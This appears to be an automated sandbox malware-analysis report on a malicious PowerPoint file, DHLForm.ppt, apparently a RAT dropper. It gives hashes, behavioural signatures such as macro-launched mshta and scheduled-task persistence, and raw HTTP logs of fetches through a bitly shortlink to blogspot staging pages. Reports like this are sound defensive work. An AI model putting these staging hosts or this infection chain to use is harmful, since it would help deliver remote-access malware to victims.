Windows Analysis Report DHLForm.ppt

Overview

General Information

Sample Name: DHLForm.ppt
Analysis ID: 483878
MD5: 5a5ff1cffdb0ea343fd5ab32c6eeb740
SHA1: e372c4f53febe5c4d74a01eb6985e80a31d52e25
SHA256: 9e4134fbb243efdb6d965eec21d98b4ad702e7fca13b5f1af47d30e3b0019585
Tags: PowershellpptPS-3losh-ratRat
Infos:

Most interesting Screenshot:

Detection

Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Creates a scheduled task launching mshta.exe (likely to bypass HIPS)
Writes or reads registry keys via WMI
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Mshta Spawning Windows Shell
Writes registry values via WMI
Document exploit detected (process start blacklist hit)
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Stores large binary data to the registry
Document contains an embedded VBA macro which executes code when the document is opened / closed
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication
Installs a global mouse hook
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Connects to a URL shortener service
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: DHLForm.ppt Virustotal: Detection: 8% Perma Link
Source: DHLForm.ppt ReversingLabs: Detection: 22%
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: unknown HTTPS traffic detected: 67.199.248.15:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.22:49166 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.22:49174 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.13:443 -> 192.168.2.22:49175 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.22:49182 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.22:49181 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.181.227:443 -> 192.168.2.22:49184 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.22:49188 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.22:49189 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.13:443 -> 192.168.2.22:49193 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.22:49196 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.22:49198 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.22:49200 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.22:49202 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.22:49204 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.13:443 -> 192.168.2.22:49207 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.22:49209 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.212.174:443 -> 192.168.2.22:49210 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.22:49212 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.22:49215 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.13:443 -> 192.168.2.22:49217 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.13:443 -> 192.168.2.22:49213 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.22:49219 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.22:49220 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.22:49221 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.22:49222 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.13:443 -> 192.168.2.22:49224 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.22:49228 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.22:49229 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.203.110:443 -> 192.168.2.22:49230 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.22:49231 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.13:443 -> 192.168.2.22:49233 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.22:49235 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.22:49236 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.22:49237 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.22:49238 version: TLS 1.2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process created: C:\Windows\System32\mshta.exe
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: bitly.com
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 67.199.248.15:443
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 67.199.248.15:443
Source: powerpnt.exe Memory has grown: Private usage: 0MB later: 9MB

Networking:

barindex
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 67.199.248.15 67.199.248.15
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /yuiwqhdsavbdjagh HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bitly.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/ayoolaayoola.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: johonathahogyaabagebarhomeintum.blogspot.com
Source: global traffic HTTP traffic detected: GET /static/v1/widgets/1667664774-css_bundle_v2.css HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=8965474558532949541&zx=9facc617-3779-4049-ad62-56a50925e3fb HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /static/v1/jsbin/403901366-ieretrofit.js HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /static/v1/widgets/4164007864-widgets.js HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /static/v1/jsbin/1621653182-comment_from_post_iframe.js HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /js/cookienotice.js HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: johonathahogyaabagebarhomeintum.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.html&type=blog HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /img/icon18_edit_allbkg.gif HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: resources.blogblog.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.html%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.html%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: accounts.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /blogblog/data/1kt/simple/gradients_light.png HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: resources.blogblog.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /blogblog/data/1kt/simple/body_gradient_tile_light.png HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: resources.blogblog.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /static/v1/v-css/281434096-static_pages.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /static/v1/jsbin/3101730221-analytics_autotrack.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.google-analytics.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /s/opensans/v23/mem5YaGs126MiZpBA-UN_r8OUuht.eot HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: fonts.gstatic.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /img/share_buttons_20_3.png HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-AliveCookie: _ga=GA1.2.1019477682.1631745871; _gid=GA1.2.1988527763.1631745871
Source: global traffic HTTP traffic detected: GET /img/blogger-logotype-color-black-1x.png HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-AliveCookie: _ga=GA1.2.1019477682.1631745871; _gid=GA1.2.1988527763.1631745871
Source: global traffic HTTP traffic detected: GET /p/ayoola.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: randikhanaekminar.blogspot.com
Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=4778963473423104316&zx=f202e5b7-10a8-4731-a0ba-0a7b50381b0c HTTP/1.1Accept: */*Referer: https://randikhanaekminar.blogspot.com/p/ayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-AliveCookie: _ga=GA1.2.1019477682.1631745871; _gid=GA1.2.1988527763.1631745871
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://randikhanaekminar.blogspot.com/p/ayoola.html&type=blog HTTP/1.1Accept: */*Referer: https://randikhanaekminar.blogspot.com/p/ayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-AliveCookie: _ga=GA1.2.1019477682.1631745871; _gid=GA1.2.1988527763.1631745871
Source: global traffic HTTP traffic detected: GET /s/roboto/v27/KFOmCnqEu92Fr1Mu4mxO.eot HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: fonts.gstatic.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://randikhanaekminar.blogspot.com/p/ayoola.html%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://randikhanaekminar.blogspot.com/p/ayoola.html%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://randikhanaekminar.blogspot.com/p/ayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: accounts.google.com
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Frandikhanaekminar.blogspot.com%2Fp%2Fayoola.html&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://randikhanaekminar.blogspot.com/p/ayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Cookie: _ga=GA1.2.1019477682.1631745871; _gid=GA1.2.1988527763.1631745871Connection: Keep-AliveHost: www.blogger.com
Source: global traffic HTTP traffic detected: GET /js/cookienotice.js HTTP/1.1Accept: */*Referer: https://randikhanaekminar.blogspot.com/p/ayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: randikhanaekminar.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/backbone16.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: startthepartyup.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /js/cookienotice.js HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: startthepartyup.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=9027821174359424672&zx=2c5db057-0ce4-4fb6-885f-019691b40909 HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-AliveCookie: _ga=GA1.2.1019477682.1631745871; _gid=GA1.2.1988527763.1631745871
Source: global traffic HTTP traffic detected: GET /p/ghostbackup15.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: ghostbackbone123.blogspot.com
Source: global traffic HTTP traffic detected: GET /js/cookienotice.js HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ghostbackbone123.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=1690726786805467605&zx=1fe0aef2-8b4f-4693-89a0-5b335e695da7 HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-AliveCookie: _ga=GA1.2.1019477682.1631745871; _gid=GA1.2.1988527763.1631745871
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%2522&type=blog HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-AliveCookie: _ga=GA1.2.1019477682.1631745871; _gid=GA1.2.1988527763.1631745871
